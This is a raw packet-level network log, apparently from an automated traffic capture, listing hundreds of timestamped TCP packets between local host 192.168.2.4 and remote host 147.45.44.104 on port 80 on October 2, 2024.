Oct 2, 2024 09:41:05.332792044 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332808971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332824945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332840919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332854986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332859993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332859993 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332901001 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332902908 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332918882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332933903 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332952023 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.332962036 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.332962036 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333076954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333093882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333110094 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333122969 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333126068 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333143950 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333159924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333173037 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333173037 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333178043 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333194971 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333213091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333240986 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333240986 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333275080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333291054 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333304882 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333319902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333336115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333347082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333347082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333352089 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333368063 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333384037 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333410978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333410978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333439112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333456039 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333471060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333486080 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333503962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333519936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.333549976 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.333549976 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.367446899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367469072 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367485046 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367501020 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367517948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367533922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367552996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.367712021 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.367712021 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.367712021 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.369477034 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.411494017 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411537886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411559105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411576986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411592960 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411609888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411642075 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411679029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.411817074 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.411818027 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.419186115 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419317961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419334888 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419343948 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419352055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419359922 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419369936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419923067 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.419955015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419970989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.419987917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420017958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420033932 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420048952 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420068979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420177937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420195103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420209885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420212030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420212030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420212030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420212030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420233965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420252085 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420254946 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420268059 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420284986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420375109 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420392036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420406103 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420484066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420500994 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420504093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420504093 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420519114 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420536041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420552969 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420569897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420581102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420581102 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420633078 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420650005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420665026 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420690060 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420690060 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420742035 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420757055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420773029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420789003 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420804977 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420823097 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420833111 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420833111 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420924902 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420950890 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420968056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420984030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.420996904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.420996904 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421000957 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421019077 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421036005 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421046972 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421046972 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421051979 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421070099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421086073 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421103954 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421112061 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421113014 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421149015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421165943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421324015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421339989 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421354055 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421370029 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421381950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421381950 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421397924 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421415091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421428919 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421442986 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421454906 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421454906 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421461105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421477079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421494961 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421510935 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421523094 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421523094 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421530962 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421546936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421582937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421582937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421592951 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421611071 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421627998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421710968 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421744108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421760082 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421776056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421792030 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421808004 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421833992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421849966 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421868086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.421896935 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.421896935 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422099113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422116041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422132015 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422148943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422164917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422182083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422198057 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422209978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422209978 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422216892 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422235012 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422254086 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422272921 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422288895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422302008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422302008 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422307968 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422326088 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422342062 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422354937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422354937 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422358036 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422375917 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422390938 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422406912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.422489882 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.422668934 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.456406116 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456455946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456490993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456526041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456526041 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.456562996 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456598997 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456599951 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.456638098 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456666946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.456768990 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.500237942 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500287056 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500324965 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500358105 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500392914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500427008 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500466108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.500485897 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.500485897 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.500621080 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508089066 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508138895 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508176088 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508210897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508244991 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508244991 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508245945 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508280993 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508318901 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508347988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508382082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508459091 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508492947 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508547068 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508580923 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508580923 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508635998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508671045 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508702040 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508702040 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508724928 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508779049 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508810997 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508812904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508843899 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508894920 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508944988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508979082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.508979082 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.508979082 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509015083 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509048939 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509080887 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509099960 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509151936 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509187937 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509219885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509249926 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509249926 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509253025 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509311914 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509344101 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509375095 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509375095 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509376049 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509409904 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509438992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509470940 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509495974 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509546041 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509578943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509612083 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509617090 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509649992 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509659052 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509700060 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509815931 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509848118 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509848118 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509870052 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509898901 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509931087 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509964943 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509993076 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.509994030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.509994030 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510010958 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510030985 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510047913 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510065079 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510080099 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510080099 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510090113 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510107040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510123014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510138988 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510150909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510150909 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510157108 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510174990 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510202885 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510215998 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510231018 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510234118 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510234118 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510247946 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510265112 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510282040 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510293007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510293007 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510298014 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510314941 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510330915 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510346889 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510359049 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510359049 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510365963 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510387897 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510401011 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510401964 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510418892 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510433912 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510449886 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510466099 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510478020 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510478020 CEST	49734	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:05.510488033 CEST	80	49734	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:05.510504007 CEST	80	49734	147.45.44.104	192.168.2.4
